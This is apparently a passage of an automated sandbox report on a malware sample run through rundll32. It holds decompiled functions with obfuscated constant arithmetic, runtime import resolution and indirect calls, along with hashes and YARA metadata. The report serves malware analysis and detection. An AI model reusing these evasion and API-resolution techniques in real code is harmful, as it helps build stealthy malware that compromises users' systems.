                                                                                                                                  0x002de10d
                                                                                                                                  0x002de112
                                                                                                                                  0x002de11a
                                                                                                                                  0x002de122
                                                                                                                                  0x002de12a
                                                                                                                                  0x002de132
                                                                                                                                  0x002de137
                                                                                                                                  0x002de13f
                                                                                                                                  0x002de147
                                                                                                                                  0x002de14f
                                                                                                                                  0x002de154
                                                                                                                                  0x002de15c
                                                                                                                                  0x002de164
                                                                                                                                  0x002de16e
                                                                                                                                  0x002de177
                                                                                                                                  0x002de17b
                                                                                                                                  0x002de183
                                                                                                                                  0x002de18b
                                                                                                                                  0x002de195
                                                                                                                                  0x002de199
                                                                                                                                  0x002de1a1
                                                                                                                                  0x002de1a7
                                                                                                                                  0x002de1a7
                                                                                                                                  0x002de1ad
                                                                                                                                  0x002de229
                                                                                                                                  0x002de22e
                                                                                                                                  0x002de237
                                                                                                                                  0x002de1af
                                                                                                                                  0x002de1b1
                                                                                                                                  0x00000000
                                                                                                                                  0x002de1b3
                                                                                                                                  0x002de1c6
                                                                                                                                  0x002de1cb
                                                                                                                                  0x002de1d1
                                                                                                                                  0x002de1d4
                                                                                                                                  0x002de1d6
                                                                                                                                  0x00000000
                                                                                                                                  0x002de1d6
                                                                                                                                  0x002de1b1
                                                                                                                                  0x002de23b
                                                                                                                                  0x002de248
                                                                                                                                  0x002de248
                                                                                                                                  0x002de1e7
                                                                                                                                  0x002de1e8
                                                                                                                                  0x002de1eb
                                                                                                                                  0x002de1f3
                                                                                                                                  0x002de1f5
                                                                                                                                  0x002de1f7
                                                                                                                                  0x002de1fd
                                                                                                                                  0x002de1fd
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (F$"
                                                                                                                                  • API String ID: 0-1034852068
                                                                                                                                  • Opcode ID: a655f382500aa22aac7b589309d5849d9024bcd9f3a5bd9abff18b30734844e3
                                                                                                                                  • Instruction ID: 7a44c2693a8101c45e2934f3f188d51ad5adcde8c58c8c0379c04fcbc6ca5ef4
                                                                                                                                  • Opcode Fuzzy Hash: a655f382500aa22aac7b589309d5849d9024bcd9f3a5bd9abff18b30734844e3
                                                                                                                                  • Instruction Fuzzy Hash: A95144B15093019FC358DF25D58A80FBBE1EB84B58F10891EF599AA260D3B1DA09CF97
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D7C37 Relevance: 2.6, Strings: 2, Instructions: 122COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E002D7C37(void* __ecx, void* __edx) {
				void* _t91;
				void* _t102;
				signed short _t108;
				signed short _t111;
				signed short _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed short _t121;
				intOrPtr _t128;
				signed short* _t132;
				signed short _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t136;

				_t134 =  *((intOrPtr*)(_t135 + 0x30));
				_push(_t134);
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t91);
				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
				_t136 = _t135 + 0x14;
				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
				_t115 = 0x47;
				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
				 *(_t136 + 0x28) = 0x411077;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
				 *(_t136 + 0x14) = 0x6ab109;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
				 *(_t136 + 0x3c) = 0x583f0;
				_t116 = 0x13;
				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
				 *(_t136 + 0x28) = 0xeb6063;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
				 *(_t136 + 0x20) = 0x8f08a1;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
				 *(_t136 + 0x1c) = 0x46d0e7;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
				 *(_t136 + 0x14) = 0x9e0f5b;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
				_t117 =  *(_t136 + 0x18);
				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t133 = _t128 + _t134;
					while(1) {
						_t105 =  *((intOrPtr*)(_t133 + 0xc));
						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
							goto L13;
						}
						_t121 = E002ECADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
						 *(_t136 + 0x18) = _t121;
						__eflags = _t121;
						if(_t121 == 0) {
							L15:
							return 0;
						}
						_t132 =  *_t133 + _t134;
						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
						while(1) {
							_t108 =  *_t132;
							__eflags = _t108;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t110 = _t108 + 2 + _t134;
								__eflags = _t108 + 2 + _t134;
							} else {
								_t110 = _t108 & 0x0000ffff;
							}
							_t111 = E002D6CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
							_t136 = _t136 + 0x10;
							__eflags = _t111;
							if(_t111 == 0) {
								goto L15;
							} else {
								_t121 =  *(_t136 + 0x18);
								_t132 =  &(_t132[2]);
								 *_t113 = _t111;
								_t113 = _t113 + 4;
								__eflags = _t113;
								continue;
							}
						}
						_t133 = _t133 + 0x14;
						__eflags = _t133;
					}
					goto L13;
				}
			}


















                                                                                                                                  0x002d7c3c
                                                                                                                                  0x002d7c42
                                                                                                                                  0x002d7c43
                                                                                                                                  0x002d7c47
                                                                                                                                  0x002d7c4b
                                                                                                                                  0x002d7c4c
                                                                                                                                  0x002d7c4d
                                                                                                                                  0x002d7c52
                                                                                                                                  0x002d7c5a
                                                                                                                                  0x002d7c5d
                                                                                                                                  0x002d7c6e
                                                                                                                                  0x002d7c71
                                                                                                                                  0x002d7c75
                                                                                                                                  0x002d7c7d
                                                                                                                                  0x002d7c8d
                                                                                                                                  0x002d7c91
                                                                                                                                  0x002d7c99
                                                                                                                                  0x002d7ca1
                                                                                                                                  0x002d7ca9
                                                                                                                                  0x002d7cb1
                                                                                                                                  0x002d7cb9
                                                                                                                                  0x002d7cc1
                                                                                                                                  0x002d7ccd
                                                                                                                                  0x002d7cd0
                                                                                                                                  0x002d7cd4
                                                                                                                                  0x002d7ce1
                                                                                                                                  0x002d7ce5
                                                                                                                                  0x002d7ced
                                                                                                                                  0x002d7cf5
                                                                                                                                  0x002d7cfa
                                                                                                                                  0x002d7d02
                                                                                                                                  0x002d7d0a
                                                                                                                                  0x002d7d12
                                                                                                                                  0x002d7d17
                                                                                                                                  0x002d7d1f
                                                                                                                                  0x002d7d27
                                                                                                                                  0x002d7d31
                                                                                                                                  0x002d7d35
                                                                                                                                  0x002d7d3d
                                                                                                                                  0x002d7d4a
                                                                                                                                  0x002d7d4e
                                                                                                                                  0x002d7d56
                                                                                                                                  0x002d7d5b
                                                                                                                                  0x002d7d66
                                                                                                                                  0x002d7d6a
                                                                                                                                  0x002d7d6c
                                                                                                                                  0x002d7d72
                                                                                                                                  0x002d7df1
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7d7b
                                                                                                                                  0x002d7d7b
                                                                                                                                  0x002d7dea
                                                                                                                                  0x002d7dea
                                                                                                                                  0x002d7def
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7d96
                                                                                                                                  0x002d7d98
                                                                                                                                  0x002d7d9c
                                                                                                                                  0x002d7d9e
                                                                                                                                  0x002d7dfc
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7dfc
                                                                                                                                  0x002d7da5
                                                                                                                                  0x002d7da7
                                                                                                                                  0x002d7de1
                                                                                                                                  0x002d7de1
                                                                                                                                  0x002d7de3
                                                                                                                                  0x002d7de5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7dab
                                                                                                                                  0x002d7db5
                                                                                                                                  0x002d7db5
                                                                                                                                  0x002d7dad
                                                                                                                                  0x002d7dad
                                                                                                                                  0x002d7dad
                                                                                                                                  0x002d7dc9
                                                                                                                                  0x002d7dce
                                                                                                                                  0x002d7dd1
                                                                                                                                  0x002d7dd3
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7dd5
                                                                                                                                  0x002d7dd5
                                                                                                                                  0x002d7dd9
                                                                                                                                  0x002d7ddc
                                                                                                                                  0x002d7dde
                                                                                                                                  0x002d7dde
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7dde
                                                                                                                                  0x002d7dd3
                                                                                                                                  0x002d7de7
                                                                                                                                  0x002d7de7
                                                                                                                                  0x002d7de7
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7dea

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: X^wE$c`
                                                                                                                                  • API String ID: 0-1321574684
                                                                                                                                  • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                  • Instruction ID: e291472770a60918432b20b8bfd81d97766513888cab1a7d90e6176b356f1e0b
                                                                                                                                  • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                  • Instruction Fuzzy Hash: 745183715083429FC718DF25D88692BBBE2FFC4358F50481EF48696261E3B5DA58CF92
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D4C5D Relevance: 2.6, Strings: 2, Instructions: 98COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                  			E002D4C5D(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _t106;
				void* _t108;
				intOrPtr* _t109;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t128;

				_v44 = _v44 & 0x00000000;
				_v48 = 0xad4f7a;
				_v16 = 0xf18dbd;
				_v16 = _v16 + 0xffff4795;
				_v16 = _v16 << 0xe;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00dff17e;
				_v12 = 0xaf5949;
				_v12 = _v12 | 0xe2d389df;
				_v12 = _v12 + 0x286;
				_t112 = 3;
				_v12 = _v12 / _t112;
				_v12 = _v12 ^ 0x4ba32b72;
				_v24 = 0x2aefd1;
				_t113 = 0x7d;
				_t128 = _a4;
				_v24 = _v24 * 0x59;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x3bb9ca43;
				_v8 = 0x985427;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x713a2c3c;
				_v8 = _v8 | 0x45eb1ca3;
				_v8 = _v8 ^ 0x77f5f6d4;
				_v28 = 0xa7f2b4;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 + 0x7e4a;
				_v28 = _v28 ^ 0x000cc7a8;
				_v40 = 0x7087c6;
				_t114 = 0x69;
				_v40 = _v40 / _t113;
				_v40 = _v40 ^ 0x00014835;
				_v20 = 0xcde00b;
				_v20 = _v20 + 0xffffcf30;
				_v20 = _v20 | 0xcdf6f1c4;
				_v20 = _v20 + 0xfc2b;
				_v20 = _v20 ^ 0xce0272c5;
				_v36 = 0x30875a;
				_v36 = _v36 * 0x47;
				_v36 = _v36 / _t114;
				_v36 = _v36 ^ 0x0028facf;
				_v32 = 0x6c449b;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 + 0xffff12fc;
				_v32 = _v32 ^ 0xfff19483;
				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
				_t134 = _t106;
				if(_t106 != 0) {
					_push(_v8);
					_push(_v24);
					_push(_v12);
					_t108 = E002E8606(_v16, 0x2d1378, _t134);
					_push(_v20);
					_t130 = _t108;
					_push(_t108);
					_push(_v40);
					_t109 = E002DCBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
					if(_t109 != 0) {
						 *_t109();
					}
					E002DA8B0(_v36, _t130, _v32);
				}
				return 0;
			}





















                                                                                                                                  0x002d4c63
                                                                                                                                  0x002d4c69
                                                                                                                                  0x002d4c70
                                                                                                                                  0x002d4c77
                                                                                                                                  0x002d4c7e
                                                                                                                                  0x002d4c82
                                                                                                                                  0x002d4c86
                                                                                                                                  0x002d4c8d
                                                                                                                                  0x002d4c94
                                                                                                                                  0x002d4c9b
                                                                                                                                  0x002d4ca8
                                                                                                                                  0x002d4cad
                                                                                                                                  0x002d4cb2
                                                                                                                                  0x002d4cb9
                                                                                                                                  0x002d4cc4
                                                                                                                                  0x002d4cc7
                                                                                                                                  0x002d4cca
                                                                                                                                  0x002d4ccd
                                                                                                                                  0x002d4cd1
                                                                                                                                  0x002d4cd8
                                                                                                                                  0x002d4cdf
                                                                                                                                  0x002d4ce3
                                                                                                                                  0x002d4cea
                                                                                                                                  0x002d4cf1
                                                                                                                                  0x002d4cf8
                                                                                                                                  0x002d4cff
                                                                                                                                  0x002d4d03
                                                                                                                                  0x002d4d0a
                                                                                                                                  0x002d4d11
                                                                                                                                  0x002d4d1d
                                                                                                                                  0x002d4d1e
                                                                                                                                  0x002d4d23
                                                                                                                                  0x002d4d2a
                                                                                                                                  0x002d4d31
                                                                                                                                  0x002d4d38
                                                                                                                                  0x002d4d3f
                                                                                                                                  0x002d4d46
                                                                                                                                  0x002d4d4d
                                                                                                                                  0x002d4d5c
                                                                                                                                  0x002d4d64
                                                                                                                                  0x002d4d67
                                                                                                                                  0x002d4d6e
                                                                                                                                  0x002d4d75
                                                                                                                                  0x002d4d79
                                                                                                                                  0x002d4d80
                                                                                                                                  0x002d4d8a
                                                                                                                                  0x002d4d8d
                                                                                                                                  0x002d4d8f
                                                                                                                                  0x002d4d92
                                                                                                                                  0x002d4d9a
                                                                                                                                  0x002d4d9d
                                                                                                                                  0x002d4da3
                                                                                                                                  0x002d4da8
                                                                                                                                  0x002d4dab
                                                                                                                                  0x002d4dad
                                                                                                                                  0x002d4dae
                                                                                                                                  0x002d4db7
                                                                                                                                  0x002d4dc1
                                                                                                                                  0x002d4dc3
                                                                                                                                  0x002d4dc3
                                                                                                                                  0x002d4dcd
                                                                                                                                  0x002d4dd3
                                                                                                                                  0x002d4dda

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: <,:q$J~
                                                                                                                                  • API String ID: 0-951887683
                                                                                                                                  • Opcode ID: 7d473088bc37a0ba9d37716cbab649426a69ff3acbb7a725edef59e10b0b32f2
                                                                                                                                  • Instruction ID: 5653b451abb60a1af39946e21b822fc92297b2dee7595fe2f1269b44bd0208a9
                                                                                                                                  • Opcode Fuzzy Hash: 7d473088bc37a0ba9d37716cbab649426a69ff3acbb7a725edef59e10b0b32f2
                                                                                                                                  • Instruction Fuzzy Hash: D6411F71D0130AABDF08CFA1C94A9EEBBB2FB54314F208159D400BA2A0D7B50B55CFA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DEE81 Relevance: 2.6, Strings: 2, Instructions: 95COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002DEE81(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				short _v48;
				short _v52;
				intOrPtr _v56;
				char _v576;
				intOrPtr* _t95;
				signed int _t99;
				signed int _t100;

				_v56 = 0x3b8b1c;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_v8 = 0xf9e323;
				_v8 = _v8 ^ 0x73816ffa;
				_v8 = _v8 + 0x5b26;
				_v8 = _v8 ^ 0x387262e7;
				_v8 = _v8 ^ 0x4b076809;
				_v20 = 0x75aab0;
				_v20 = _v20 ^ 0xc40c30fa;
				_v20 = _v20 + 0x78e9;
				_v20 = _v20 ^ 0xc4737271;
				_v16 = 0xa8e87a;
				_v16 = _v16 + 0xffff799a;
				_t99 = 0x33;
				_v16 = _v16 / _t99;
				_v16 = _v16 ^ 0x000fed3f;
				_v28 = 0x7feeb5;
				_v28 = _v28 + 0xffffe4f6;
				_v28 = _v28 ^ 0x007d0c9c;
				_v32 = 0x59c916;
				_t100 = 0x5d;
				_v32 = _v32 / _t100;
				_v32 = _v32 ^ 0x000d1fec;
				_v12 = 0x866588;
				_v12 = _v12 ^ 0x68ade4cb;
				_v12 = _v12 + 0xffffbaa5;
				_v12 = _v12 ^ 0x68223e43;
				_v36 = 0xbafac2;
				_v36 = _v36 ^ 0x5e34b155;
				_v36 = _v36 ^ 0x5e8c811c;
				_v24 = 0xc770cb;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x95635bf4;
				_v24 = _v24 ^ 0x956359d7;
				_v40 = 0xbd0b83;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x001e2563;
				_t101 = _v8;
				if(E002E8F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
					_t95 =  &_v576;
					if(_v576 != 0) {
						while( *_t95 != 0x5c) {
							_t95 = _t95 + 2;
							if( *_t95 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t101 = 0;
						 *((short*)(_t95 + 2)) = 0;
					}
					L6:
					E002EDB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
				}
				return _v44;
			}




















                                                                                                                                  0x002dee8a
                                                                                                                                  0x002dee96
                                                                                                                                  0x002dee99
                                                                                                                                  0x002dee9c
                                                                                                                                  0x002dee9f
                                                                                                                                  0x002deea6
                                                                                                                                  0x002deead
                                                                                                                                  0x002deeb4
                                                                                                                                  0x002deebb
                                                                                                                                  0x002deec2
                                                                                                                                  0x002deec9
                                                                                                                                  0x002deed0
                                                                                                                                  0x002deed7
                                                                                                                                  0x002deede
                                                                                                                                  0x002deee5
                                                                                                                                  0x002deef1
                                                                                                                                  0x002deef6
                                                                                                                                  0x002deefb
                                                                                                                                  0x002def02
                                                                                                                                  0x002def09
                                                                                                                                  0x002def10
                                                                                                                                  0x002def17
                                                                                                                                  0x002def21
                                                                                                                                  0x002def2a
                                                                                                                                  0x002def2d
                                                                                                                                  0x002def34
                                                                                                                                  0x002def3b
                                                                                                                                  0x002def48
                                                                                                                                  0x002def4f
                                                                                                                                  0x002def56
                                                                                                                                  0x002def5d
                                                                                                                                  0x002def64
                                                                                                                                  0x002def6b
                                                                                                                                  0x002def72
                                                                                                                                  0x002def76
                                                                                                                                  0x002def7d
                                                                                                                                  0x002def84
                                                                                                                                  0x002def8b
                                                                                                                                  0x002def8f
                                                                                                                                  0x002defa0
                                                                                                                                  0x002defad
                                                                                                                                  0x002defaf
                                                                                                                                  0x002defbc
                                                                                                                                  0x002defbe
                                                                                                                                  0x002defc4
                                                                                                                                  0x002defca
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002defcc
                                                                                                                                  0x00000000
                                                                                                                                  0x002defca
                                                                                                                                  0x002defce
                                                                                                                                  0x002defd0
                                                                                                                                  0x002defd0
                                                                                                                                  0x002defd4
                                                                                                                                  0x002deff2
                                                                                                                                  0x002deff7
                                                                                                                                  0x002df001

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: C>"h$br8
                                                                                                                                  • API String ID: 0-573140060
                                                                                                                                  • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                  • Instruction ID: 47f80d6e184901399ab4626288f01866cb2032d8af9029b839e3a697b8bf0dce
                                                                                                                                  • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                  • Instruction Fuzzy Hash: E041F272C0121EEBCF18DFE4C94A5EEBBB5FB04304F20819AE515B6260E3B45A55CF91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EAA30 Relevance: 2.6, Strings: 2, Instructions: 67COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E002EAA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t83;
				signed int _t85;
				signed int _t91;

				_v40 = _v40 & 0x00000000;
				_v48 = 0xea50c7;
				_v44 = 0x183406;
				_v8 = 0x4cb37c;
				_v8 = _v8 + 0xc736;
				_v8 = _v8 + 0xd4a7;
				_t91 = __edx;
				_t85 = 0x64;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 ^ 0x0dcd94f9;
				_v24 = 0x238f3e;
				_v24 = _v24 << 3;
				_v24 = _v24 ^ 0x011b8be3;
				_v20 = 0x73abc8;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x00035013;
				_v16 = 0x5012b6;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000aff4c;
				_v12 = 0x8c34bb;
				_v12 = _v12 | 0x8c5a3f77;
				_v12 = _v12 + 0xffff11fb;
				_v12 = _v12 ^ 0x2d4fbea1;
				_v12 = _v12 ^ 0xa19c1e56;
				_v36 = 0xff820a;
				_v36 = _v36 | 0x4fe4a4bc;
				_v36 = _v36 ^ 0x4ffdd4f4;
				_v32 = 0x36506a;
				_v32 = _v32 + 0x4de;
				_v32 = _v32 ^ 0x003709b9;
				_v28 = 0x64fd3b;
				_v28 = _v28 + 0xffff3e7a;
				_v28 = _v28 ^ 0x00656766;
				if( *((intOrPtr*)(0x2f3210 + __edx * 4)) == 0) {
					_t83 = E002E0A0E(_t85, _t85, _a4);
					_push(_v28);
					_push(_a12);
					_push(_v32);
					_push(_t83);
					 *((intOrPtr*)(0x2f3210 + _t91 * 4)) = E002DCDCD(_v12, _v36);
				}
				return  *((intOrPtr*)(0x2f3210 + _t91 * 4));
			}

















                                                                                                                                  0x002eaa36
                                                                                                                                  0x002eaa3a
                                                                                                                                  0x002eaa41
                                                                                                                                  0x002eaa48
                                                                                                                                  0x002eaa4f
                                                                                                                                  0x002eaa56
                                                                                                                                  0x002eaa62
                                                                                                                                  0x002eaa68
                                                                                                                                  0x002eaa69
                                                                                                                                  0x002eaa6c
                                                                                                                                  0x002eaa73
                                                                                                                                  0x002eaa7a
                                                                                                                                  0x002eaa7e
                                                                                                                                  0x002eaa85
                                                                                                                                  0x002eaa8c
                                                                                                                                  0x002eaa90
                                                                                                                                  0x002eaa97
                                                                                                                                  0x002eaa9e
                                                                                                                                  0x002eaaa7
                                                                                                                                  0x002eaaaa
                                                                                                                                  0x002eaab1
                                                                                                                                  0x002eaab8
                                                                                                                                  0x002eaabf
                                                                                                                                  0x002eaac6
                                                                                                                                  0x002eaacd
                                                                                                                                  0x002eaad4
                                                                                                                                  0x002eaadb
                                                                                                                                  0x002eaae2
                                                                                                                                  0x002eaae9
                                                                                                                                  0x002eaaf0
                                                                                                                                  0x002eaaf7
                                                                                                                                  0x002eaafe
                                                                                                                                  0x002eab05
                                                                                                                                  0x002eab0c
                                                                                                                                  0x002eab1b
                                                                                                                                  0x002eab2e
                                                                                                                                  0x002eab33
                                                                                                                                  0x002eab36
                                                                                                                                  0x002eab39
                                                                                                                                  0x002eab42
                                                                                                                                  0x002eab4b
                                                                                                                                  0x002eab4b
                                                                                                                                  0x002eab5d

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: fge$jP6
                                                                                                                                  • API String ID: 0-775479084
                                                                                                                                  • Opcode ID: a1f4548dfc3eca77017b3754098c7c7bcbe6bc34bb943c5378e230eb2a9e894e
                                                                                                                                  • Instruction ID: 12918f9da8feabb982f0af5649e139c0763c73aa8cac5a549ed3a48883028361
                                                                                                                                  • Opcode Fuzzy Hash: a1f4548dfc3eca77017b3754098c7c7bcbe6bc34bb943c5378e230eb2a9e894e
                                                                                                                                  • Instruction Fuzzy Hash: E031EEB1C0020DEBCB08DFA5CA8A9AEBBB5FB08318F108159D511B6220C3B95A49CF95
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002F0E3A Relevance: 2.6, Strings: 2, Instructions: 61COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002F0E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
